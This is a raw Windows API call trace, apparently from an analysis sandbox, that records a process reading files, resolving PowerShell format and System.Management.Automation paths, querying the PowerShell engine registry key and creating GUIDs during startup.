	[0378.580] ReadFile (in: hFile=0x300, lpBuffer=0x2ce20d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cfd8, lpOverlapped=0x0 | out: lpBuffer=0x2ce20d8*, lpNumberOfBytesRead=0x14cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0378.580] ReadFile (in: hFile=0x300, lpBuffer=0x2ce20d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cfd8, lpOverlapped=0x0 | out: lpBuffer=0x2ce20d8*, lpNumberOfBytesRead=0x14cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0378.580] ReadFile (in: hFile=0x300, lpBuffer=0x2ce20d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cfd8, lpOverlapped=0x0 | out: lpBuffer=0x2ce20d8*, lpNumberOfBytesRead=0x14cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0378.581] ReadFile (in: hFile=0x300, lpBuffer=0x2ce20d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cfd8, lpOverlapped=0x0 | out: lpBuffer=0x2ce20d8*, lpNumberOfBytesRead=0x14cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0378.581] ReadFile (in: hFile=0x300, lpBuffer=0x2ce20d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cfd8, lpOverlapped=0x0 | out: lpBuffer=0x2ce20d8*, lpNumberOfBytesRead=0x14cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0378.581] ReadFile (in: hFile=0x300, lpBuffer=0x2ce20d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cfd8, lpOverlapped=0x0 | out: lpBuffer=0x2ce20d8*, lpNumberOfBytesRead=0x14cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0378.581] ReadFile (in: hFile=0x300, lpBuffer=0x2ce20d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cfd8, lpOverlapped=0x0 | out: lpBuffer=0x2ce20d8*, lpNumberOfBytesRead=0x14cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0378.582] ReadFile (in: hFile=0x300, lpBuffer=0x2ce20d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cfd8, lpOverlapped=0x0 | out: lpBuffer=0x2ce20d8*, lpNumberOfBytesRead=0x14cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0378.582] ReadFile (in: hFile=0x300, lpBuffer=0x2ce20d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cfd8, lpOverlapped=0x0 | out: lpBuffer=0x2ce20d8*, lpNumberOfBytesRead=0x14cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0378.582] ReadFile (in: hFile=0x300, lpBuffer=0x2ce20d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cfd8, lpOverlapped=0x0 | out: lpBuffer=0x2ce20d8*, lpNumberOfBytesRead=0x14cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0378.582] ReadFile (in: hFile=0x300, lpBuffer=0x2ce20d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cfd8, lpOverlapped=0x0 | out: lpBuffer=0x2ce20d8*, lpNumberOfBytesRead=0x14cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0378.582] ReadFile (in: hFile=0x300, lpBuffer=0x2ce20d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cfd8, lpOverlapped=0x0 | out: lpBuffer=0x2ce20d8*, lpNumberOfBytesRead=0x14cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0378.583] ReadFile (in: hFile=0x300, lpBuffer=0x2ce20d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cfd8, lpOverlapped=0x0 | out: lpBuffer=0x2ce20d8*, lpNumberOfBytesRead=0x14cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0378.584] ReadFile (in: hFile=0x300, lpBuffer=0x2ce20d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cfd8, lpOverlapped=0x0 | out: lpBuffer=0x2ce20d8*, lpNumberOfBytesRead=0x14cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0378.585] ReadFile (in: hFile=0x300, lpBuffer=0x2ce20d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cfd8, lpOverlapped=0x0 | out: lpBuffer=0x2ce20d8*, lpNumberOfBytesRead=0x14cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0378.585] ReadFile (in: hFile=0x300, lpBuffer=0x2ce20d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cfd8, lpOverlapped=0x0 | out: lpBuffer=0x2ce20d8*, lpNumberOfBytesRead=0x14cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0378.585] ReadFile (in: hFile=0x300, lpBuffer=0x2ce20d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cfd8, lpOverlapped=0x0 | out: lpBuffer=0x2ce20d8*, lpNumberOfBytesRead=0x14cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0378.585] ReadFile (in: hFile=0x300, lpBuffer=0x2ce20d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cfd8, lpOverlapped=0x0 | out: lpBuffer=0x2ce20d8*, lpNumberOfBytesRead=0x14cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0378.585] ReadFile (in: hFile=0x300, lpBuffer=0x2ce20d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cfd8, lpOverlapped=0x0 | out: lpBuffer=0x2ce20d8*, lpNumberOfBytesRead=0x14cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0378.586] ReadFile (in: hFile=0x300, lpBuffer=0x2ce20d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cfd8, lpOverlapped=0x0 | out: lpBuffer=0x2ce20d8*, lpNumberOfBytesRead=0x14cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0378.586] ReadFile (in: hFile=0x300, lpBuffer=0x2ce20d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cfd8, lpOverlapped=0x0 | out: lpBuffer=0x2ce20d8*, lpNumberOfBytesRead=0x14cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0378.586] ReadFile (in: hFile=0x300, lpBuffer=0x2ce20d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cfd8, lpOverlapped=0x0 | out: lpBuffer=0x2ce20d8*, lpNumberOfBytesRead=0x14cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0378.586] ReadFile (in: hFile=0x300, lpBuffer=0x2ce20d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cfd8, lpOverlapped=0x0 | out: lpBuffer=0x2ce20d8*, lpNumberOfBytesRead=0x14cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0378.586] ReadFile (in: hFile=0x300, lpBuffer=0x2ce20d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cfd8, lpOverlapped=0x0 | out: lpBuffer=0x2ce20d8*, lpNumberOfBytesRead=0x14cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0378.586] ReadFile (in: hFile=0x300, lpBuffer=0x2ce20d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cfd8, lpOverlapped=0x0 | out: lpBuffer=0x2ce20d8*, lpNumberOfBytesRead=0x14cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0378.586] ReadFile (in: hFile=0x300, lpBuffer=0x2ce20d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cfd8, lpOverlapped=0x0 | out: lpBuffer=0x2ce20d8*, lpNumberOfBytesRead=0x14cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0378.587] ReadFile (in: hFile=0x300, lpBuffer=0x2ce20d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cfd8, lpOverlapped=0x0 | out: lpBuffer=0x2ce20d8*, lpNumberOfBytesRead=0x14cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0378.587] ReadFile (in: hFile=0x300, lpBuffer=0x2ce20d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cfd8, lpOverlapped=0x0 | out: lpBuffer=0x2ce20d8*, lpNumberOfBytesRead=0x14cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0378.587] ReadFile (in: hFile=0x300, lpBuffer=0x2ce20d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cfd8, lpOverlapped=0x0 | out: lpBuffer=0x2ce20d8*, lpNumberOfBytesRead=0x14cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0378.587] ReadFile (in: hFile=0x300, lpBuffer=0x2ce20d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cfd8, lpOverlapped=0x0 | out: lpBuffer=0x2ce20d8*, lpNumberOfBytesRead=0x14cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0378.587] ReadFile (in: hFile=0x300, lpBuffer=0x2ce20d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cfd8, lpOverlapped=0x0 | out: lpBuffer=0x2ce20d8*, lpNumberOfBytesRead=0x14cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0378.587] ReadFile (in: hFile=0x300, lpBuffer=0x2ce20d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cfd8, lpOverlapped=0x0 | out: lpBuffer=0x2ce20d8*, lpNumberOfBytesRead=0x14cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0378.587] ReadFile (in: hFile=0x300, lpBuffer=0x2ce20d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cfd8, lpOverlapped=0x0 | out: lpBuffer=0x2ce20d8*, lpNumberOfBytesRead=0x14cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0378.587] ReadFile (in: hFile=0x300, lpBuffer=0x2ce20d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cfd8, lpOverlapped=0x0 | out: lpBuffer=0x2ce20d8*, lpNumberOfBytesRead=0x14cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0378.588] ReadFile (in: hFile=0x300, lpBuffer=0x2ce20d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cfd8, lpOverlapped=0x0 | out: lpBuffer=0x2ce20d8*, lpNumberOfBytesRead=0x14cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0378.588] ReadFile (in: hFile=0x300, lpBuffer=0x2ce20d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cfd8, lpOverlapped=0x0 | out: lpBuffer=0x2ce20d8*, lpNumberOfBytesRead=0x14cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0378.588] ReadFile (in: hFile=0x300, lpBuffer=0x2ce20d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cfd8, lpOverlapped=0x0 | out: lpBuffer=0x2ce20d8*, lpNumberOfBytesRead=0x14cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0378.588] ReadFile (in: hFile=0x300, lpBuffer=0x2ce20d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cfd8, lpOverlapped=0x0 | out: lpBuffer=0x2ce20d8*, lpNumberOfBytesRead=0x14cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0378.588] ReadFile (in: hFile=0x300, lpBuffer=0x2ce20d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cfd8, lpOverlapped=0x0 | out: lpBuffer=0x2ce20d8*, lpNumberOfBytesRead=0x14cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0378.588] ReadFile (in: hFile=0x300, lpBuffer=0x2ce20d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cfd8, lpOverlapped=0x0 | out: lpBuffer=0x2ce20d8*, lpNumberOfBytesRead=0x14cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0378.588] ReadFile (in: hFile=0x300, lpBuffer=0x2ce20d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cfd8, lpOverlapped=0x0 | out: lpBuffer=0x2ce20d8*, lpNumberOfBytesRead=0x14cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0378.588] ReadFile (in: hFile=0x300, lpBuffer=0x2ce20d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cfd8, lpOverlapped=0x0 | out: lpBuffer=0x2ce20d8*, lpNumberOfBytesRead=0x14cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0378.589] ReadFile (in: hFile=0x300, lpBuffer=0x2ce20d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cfd8, lpOverlapped=0x0 | out: lpBuffer=0x2ce20d8*, lpNumberOfBytesRead=0x14cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0378.589] ReadFile (in: hFile=0x300, lpBuffer=0x2ce20d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cfd8, lpOverlapped=0x0 | out: lpBuffer=0x2ce20d8*, lpNumberOfBytesRead=0x14cfd8*=0xf37, lpOverlapped=0x0) returned 1
	[0378.589] ReadFile (in: hFile=0x300, lpBuffer=0x2ce1777, nNumberOfBytesToRead=0xc9, lpNumberOfBytesRead=0x14cfd8, lpOverlapped=0x0 | out: lpBuffer=0x2ce1777*, lpNumberOfBytesRead=0x14cfd8*=0x0, lpOverlapped=0x0) returned 1
	[0378.589] ReadFile (in: hFile=0x300, lpBuffer=0x2ce20d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cfd8, lpOverlapped=0x0 | out: lpBuffer=0x2ce20d8*, lpNumberOfBytesRead=0x14cfd8*=0x0, lpOverlapped=0x0) returned 1
	[0378.589] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14cd20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0378.589] SetErrorMode (uMode=0x1) returned 0x1
	[0378.589] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x14cf80 | out: lpFileInformation=0x14cf80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e51ae9, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e51ae9, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e9c3af, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3ef37)) returned 1
	[0378.589] SetErrorMode (uMode=0x1) returned 0x1
	[0378.589] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14ccb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0378.590] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d068 | out: phkResult=0x14d068*=0x300) returned 0x0
	[0378.590] RegQueryValueExW (in: hKey=0x300, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14cfec, lpData=0x0, lpcbData=0x14cfe8*=0x0 | out: lpType=0x14cfec*=0x1, lpData=0x0, lpcbData=0x14cfe8*=0x56) returned 0x0
	[0378.590] CoTaskMemAlloc (cb=0x5a) returned 0x42efa0
	[0378.590] RegQueryValueExW (in: hKey=0x300, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14cfbc, lpData=0x42efa0, lpcbData=0x14cfb8*=0x56 | out: lpType=0x14cfbc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x14cfb8*=0x56) returned 0x0
	[0378.590] CoTaskMemFree (pv=0x42efa0) 
	[0378.590] RegCloseKey (hKey=0x300) returned 0x0
	[0378.590] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14ccb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0378.590] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14cb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0378.593] CoCreateGuid (in: pguid=0x14d290 | out: pguid=0x14d290*(Data1=0x33dd6aed, Data2=0x1749, Data3=0x44c2, Data4=([0]=0x92, [1]=0x5f, [2]=0xb5, [3]=0x30, [4]=0x6c, [5]=0x9d, [6]=0xcb, [7]=0x7b))) returned 0x0
	[0378.593] CoCreateGuid (in: pguid=0x14d290 | out: pguid=0x14d290*(Data1=0x34df34d1, Data2=0xa098, Data3=0x4f11, Data4=([0]=0x94, [1]=0xa1, [2]=0xdd, [3]=0xd3, [4]=0xe1, [5]=0xe2, [6]=0x6e, [7]=0x1b))) returned 0x0
	[0378.593] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c730, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0378.594] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0378.594] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0378.594] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.083] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c730, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.083] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.083] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.084] CoCreateGuid (in: pguid=0x14d290 | out: pguid=0x14d290*(Data1=0xa871570e, Data2=0xbedc, Data3=0x4862, Data4=([0]=0x90, [1]=0x52, [2]=0xf4, [3]=0x95, [4]=0xd1, [5]=0x0, [6]=0x95, [7]=0x89))) returned 0x0
	[0379.084] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c370, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.084] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c2c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.084] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c2c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.084] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c370, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.084] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c2c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.085] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c2c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.085] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c730, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.085] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.085] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.085] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14be20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.086] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14bd70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.086] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14bd70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.086] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c730, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.086] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.086] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.086] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c730, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.087] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.087] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.087] VirtualQuery (in: lpAddress=0x14b2a0, lpBuffer=0x14c160, dwLength=0x30 | out: lpBuffer=0x14c160*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
